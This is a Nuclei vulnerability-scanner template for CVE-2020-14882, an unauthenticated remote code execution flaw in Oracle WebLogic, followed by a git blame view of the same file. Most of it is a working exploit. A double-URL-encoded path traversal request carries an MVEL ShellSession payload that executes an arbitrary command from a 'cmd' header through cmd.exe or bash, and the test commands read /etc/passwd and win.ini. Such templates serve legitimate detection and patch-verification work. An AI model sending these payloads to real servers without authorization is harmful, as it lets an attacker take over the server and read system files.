nuclei-templates/cves/2020/CVE-2020-14882.yaml

id: CVE-2020-14882

info:
  name: Oracle WebLogic Server Unauthenticated RCE (and Patch Bypass)
  author: dwisiswant0
  severity: critical
  reference: |
    - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
    - https://twitter.com/jas502n/status/1321416053050667009
    - https://youtu.be/JFVDOIL0YtA
    - https://github.com/jas502n/CVE-2020-14882#eg
  description: |
    Vulnerability in the Oracle WebLogic Server
    product of Oracle Fusion Middleware (component: Console).
    Supported versions that are affected are 10.3.6.0.0,
    12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.
    Easily exploitable vulnerability allows unauthenticated
    attacker with network access via HTTP to compromise the server.
    Successful attacks of this vulnerability can result in takeover.
  tags: cve,cve2020,oracle,rce,weblogic

requests:
  - payloads:
      exec:
        - "type C:\\Windows\\win.ini"  # Windows
        - "cat /etc/passwd"  # *nix
    raw:
      - |
        POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
        Host: {{Hostname}}
        cmd: §exec§
        Connection: close
        Content-Type: application/x-www-form-urlencoded; charset=utf-8

        _nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or
        part: body
      - type: status
        status:
          - 200
misc changes 2021-01-02 04:56:15 +00:00			`id: CVE-2020-14882`
:fire: Update CVE-2020-14882 payload & with positive matchers 2020-11-02 07:23:12 +00:00
			`info:`
			`name: Oracle WebLogic Server Unauthenticated RCE (and Patch Bypass)`
			`author: dwisiswant0`
			`severity: critical`
linting updates 2021-03-12 07:10:16 +00:00			`reference: \|`
Put references in the right place 2021-03-11 15:26:35 +00:00			`- https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf`
			`- https://twitter.com/jas502n/status/1321416053050667009`
			`- https://youtu.be/JFVDOIL0YtA`
			`- https://github.com/jas502n/CVE-2020-14882#eg`
:fire: Update CVE-2020-14882 payload & with positive matchers 2020-11-02 07:23:12 +00:00			`description: \|`
			`Vulnerability in the Oracle WebLogic Server`
			`product of Oracle Fusion Middleware (component: Console).`
			`Supported versions that are affected are 10.3.6.0.0,`
			`12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.`
			`Easily exploitable vulnerability allows unauthenticated`
			`attacker with network access via HTTP to compromise the server.`
			`Successful attacks of this vulnerability can result in takeover.`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`tags: cve,cve2020,oracle,rce,weblogic`
:fire: Update CVE-2020-14882 payload & with positive matchers 2020-11-02 07:23:12 +00:00
			`requests:`
			`- payloads:`
			`exec:`
			`- "type C:\\Windows\\win.ini" # Windows`
			`- "cat /etc/passwd" # *nix`
			`raw:`
			`- \|`
			`POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1`
			`Host: {{Hostname}}`
Marker updates to payloads Adding § marker to variable names to avoid any confusion with real data and variable name, supported from nuclei v2.2.0 2020-11-21 06:55:49 +00:00			`cmd: §exec§`
:fire: Update CVE-2020-14882 payload & with positive matchers 2020-11-02 07:23:12 +00:00			`Connection: close`
			`Content-Type: application/x-www-form-urlencoded; charset=utf-8`

			_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
matcher update to handle edge cases 2021-07-24 21:35:55 +00:00			`- "root:.*:0:0:"`
:fire: Update CVE-2020-14882 payload & with positive matchers 2020-11-02 07:23:12 +00:00			`- "\\[(font\|extension\|file)s\\]"`
			`condition: or`
			`part: body`
			`- type: status`
			`status:`
			`- 200`